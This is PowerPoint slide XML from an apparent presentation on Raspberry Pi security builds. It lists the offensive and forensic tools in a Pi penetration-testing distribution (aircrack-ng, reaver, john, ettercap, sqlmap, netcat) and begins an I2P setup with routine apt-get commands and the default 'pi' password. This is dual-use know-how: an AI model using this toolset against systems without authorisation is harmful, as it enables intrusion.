              <a:t>, bing-ip2hosts-0.2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>metagoofil-blackhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ExploitDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, S.E.T, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Fasttrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>airdecloak-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>packetforge-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, wash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>airdecap-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ivstools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>makeivs-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, airbase-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>airserv-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>airdriver-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>airtun-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>btscanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>obexftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>reaver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, kismet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>prismstumbler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>wavemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>weplab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>fping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, hping3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>nbtscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>onesixtyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, p0f, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sslscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tcptraceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xprobe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>zenmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>pbnj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>bkhive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(not sure why)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>chntpw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(really not sure why)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>dsniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>etherape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, john </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(dudes, if the Raspberry Pi is the fastest thing you have to crack passwords on, there is a problem)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, medusa, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>netsed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ophcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(same comment as with john)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>packeth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>packit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, samdump2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(again, not sure why)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ssldump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tcpick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tcpreplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yersinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>fcrackzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sipcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sipsak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, curl, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>flasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ratproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, w3af, wapiti, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>wbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>skipfish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>,  6tunnel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>cryptcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, dns2tcpt, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>socat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, stunnel4, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>tinyproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>udptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>vidalia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>openvpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, iodine, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>httptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>aimage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>chkrootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, foremost, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>galleta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>magicrescue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>mboxgrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, scalpel, scrub, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>vinetto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, wipe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ok, most of the forensic tools I doubt you would want to use much on the Raspberry Pi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Dissy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, siege, Pentbox-1.5, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ipcalc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sendemail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>macchanger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3821580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Setting up I2P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6253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update, add some useful tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1600200"/>
            <a:ext cx="9067800" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Login to the “pi” account, default password is “raspberry” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>change it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>I dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, apt-get to update:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>apt-get update; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> apt-get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>upgrade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>we will want to add a few </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>packages:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>apt-get install default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>jre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-headless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xrdp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2112750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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the I2P Install</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1600200"/>
            <a:ext cx="9067800" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Login as pi or some other non root account, set up directories:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cd ~</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
